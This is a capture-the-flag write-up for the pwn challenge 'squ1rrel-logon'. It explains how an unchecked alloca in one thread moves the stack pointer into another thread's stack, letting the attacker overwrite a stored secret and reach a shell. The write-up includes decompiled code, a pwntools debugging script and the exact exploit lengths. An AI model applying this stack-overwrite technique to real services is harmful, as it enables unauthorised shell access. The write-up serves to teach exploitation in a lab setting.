Skip to content

pwn/squ1rrel-logon

We are provided with a terminal binary, that serves as a authenticated gateway to a command line shell on the target server.

The main function spawns two threads, userinfo and auth:

c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  print_banner();
  pthread_create(&userinfo_thread, 0LL, userinfo, 0LL);
  pthread_create(&auth_thread, 0LL, auth, 0LL);
  pthread_join(auth_thread, 0LL);
  return 0;
}

Note that the auth thread is spawned after the userinfo thread. This will be important in a moment.

alloca

Let's have a look at the userinfo thread:

c
void *__fastcall userinfo(void *a1)
{
  void *v1; // rsp
  void *v2; // rsp
  _QWORD v4[2]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 sname_len; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 fname_len; // [rsp+18h] [rbp-18h] BYREF
  const char *v7; // [rsp+20h] [rbp-10h]
  const char *v8; // [rsp+28h] [rbp-8h]

  v4[1] = a1;
  puts("\x1B[1;36m[AUTH] User identification required\x1B[0m");
  printf("First Name Length: ");
  __isoc99_scanf("%ld%*c", &fname_len);
  printf("Surname Length: ");
  __isoc99_scanf("%ld%*c", &sname_len);
  if ( fname_len > 0x100000000LL || sname_len > 0x100000000LL )
  {
    puts("Too long for our systems.");
    exit(1);
  }
  v1 = alloca(16 * ((fname_len + 23) / 0x10));
  v8 = (const char *)v4;
  v2 = alloca(16 * ((sname_len + 23) / 0x10));
  v7 = (const char *)v4;
  printf("First Name: ");
  readline(v8, fname_len);
  printf("Surname: ");
  readline(v7, sname_len);
  printf("Authenticating Employee %s %s\n", v8, v7);
  return 0LL;
}

Looks fairly normal, except for the call to alloca. The alloca function is similar to the malloc function in that it dynamically allocates memory. However, unlike malloc, it allocates memory on the stack instead of the heap.

We can see how this works by inspecting the assembly:

asm
mov     rax, [rbp+fname_len]
lea     rdx, [rax+8]
mov     eax, 10h
sub     rax, 1
add     rax, rdx
mov     ecx, 10h
mov     edx, 0
div     rcx
imul    rax, 10h
sub     rsp, rax

After doing some math to round fname_len up to the nearest 16 bytes, it simply does a sub rsp, rax.

Recall that the stack grows from higher addresses to lower addresses, so a sub rsp, rax will allocate space on the stack. This space will automatically be deallocated when the function exits as the stack frame is cleaned up.

However, notice that almost no checks are conducted to determine that we have sufficient stack space to accommodate the allocation. There is a check that fname_len is not more than 0x100000000 bytes, but this is still a very generous limit (4GiB). We probably don't have 4GiB of stack space to allocate!

So, what happens if we alloca more memory than we actually have? This will depend on the memory layout of the process. Let's have a look with vmmap in GDB:

image-20250410081256144

Our current thread, userinfo, is thread 2. Our stack space spans from 0x00007ffff7401000 to 0x00007ffff7c01000 (stack-th2).

Interestingly, the auth thread's stack is at a lower address, 0x00007ffff6a01000 to 0x00007ffff7201000 (stack-th3) than our thread . This is because the stack space for auth was allocated after userinfo.

This means that if we allocate a sufficiently large buffer, we can make rsp point into the stack space of the auth thread! We can then write a first name of our choice into the stack memory of auth.

But what should we target in the auth thread?

auth

Let's have a look at the auth function:

c
void *__fastcall auth(void *a1)
{
  char s1[256]; // [rsp+10h] [rbp-210h] BYREF
  char buf[264]; // [rsp+110h] [rbp-110h] BYREF
  int v4; // [rsp+218h] [rbp-8h]
  int fd; // [rsp+21Ch] [rbp-4h]

  fd = open("flag.txt", 0);
  if ( fd < 0 )
  {
    puts("Error initializing authentication. Please contact support if on remote.");
    exit(1);
  }
  v4 = read(fd, buf, 0x100uLL);
  buf[v4 - 1] = 0;
  close(fd);
  pthread_join(userinfo_thread, 0LL);
  printf("\x1B[1;36m[SYSTEM] Enter security token: \x1B[0m");
  readline(s1, 256LL);
  if ( !strcmp(s1, buf) )
  {
    puts("\x1B[1;32m[ACCESS GRANTED] Welcome to the system\x1B[0m");
    system("/bin/sh");
  }
  else
  {
    puts("\x1B[1;31m[ACCESS DENIED] Invalid security token\x1B[0m");
    puts("\x1B[1;31m[SYSTEM] Session terminated\x1B[0m");
  }
  return 0LL;
}

The key functionality of the auth function is verifying that the user knows the flag, which is stored on the stack in the buf variable. Since we do not know the flag, it is impossible to pass this check without cheating.

However, now that we can overwrite stack memory in auth, all we need to do is overwrite buf to a value we know, then enter that value as the secret to obtain the flag.

The only obstacle now is to determine the amount of memory to allocate so that rsp falls exactly at the start of buf.

To do this, I wrote a simple script to print the value of rsp after the allocation of the buffer for the first name, and the address of buf. We can then subtract these two values to determine the offset required:

python
from pwn import *

e = ELF("terminal")
context.binary = e


def setup():
    p = process()
    # p = remote("")
    return p


if __name__ == '__main__':
    p = setup()
    _, g = gdb.attach(p, "break *0x401484\nbreak *0x4015fb\nc", api=True)
    p.sendlineafter(b"Length:", b"10")
    p.sendlineafter(b"Length:", b"10")
    g.wait()
    print(g.execute("p $rsp\nc", to_string=True))
    p.sendlineafter(b"ame:", b"A\n")
    p.sendlineafter(b"ame:", b"B\n")
    p.sendlineafter(b"token", b"A\n")
    g.wait()
    print(g.execute("p $rsi\nc", to_string=True))


    p.interactive()

Upon running this script, we might obtain something like

$1 = (void *) 0x7f5ae9fffe80

$3 = 0x7f5ae95ffdc0

The difference between these values is 10485952, so we will need to update our fname_len to 10485952+10 which is 10485962.

Unfortunately, if we use this fname_len as is, the program crashes with a segfault.

image-20250407232841261

This is due to the stack space used during the

c
printf("Authenticating Employee %s %s\n", v8, v7);

call in userinfo. As rsp is within the stack memory of auth, any additional allocations will overwrite critical addresses stored in the stack of auth, resulting in a subsequent crash.

To solve this problem, we can set the surname length to a large value, such as 5000. This will ensure that rsp is far away from any critical parts of auth's memory when the printf call uses stack memory.

With this fix, we are successful in obtaining a shell locally:

image-20250407233249263

However, the same exploit does not work on the server 🤔

image-20250407233325483

Debugging

Perplexed, I sent my script and exploit to a teammate for some suggestions. To my surprise, the output of the script on his system was:

$1 = (void *) 0x7f68450aedb0

$2 = 0x7f68448adcea

The difference was 8392902, much smaller than the expected 10485952 calculated on my system.

On his system, the correct fname_len should thus have been 8392912 instead of 10485962.

A vmmap explains this discrepancy:

img

On this system, there is no space between the end of the stack space for the auth thread and the start of the next mapped page. However, on my system, there is a large unmapped region, resulting in a larger offset. This difference is probably a result of different kernel versions handling the allocation of pages slightly differently.

After replacing the fname_len with the newly calculated 8392912, the exploit works as expected:

image-20250409223506238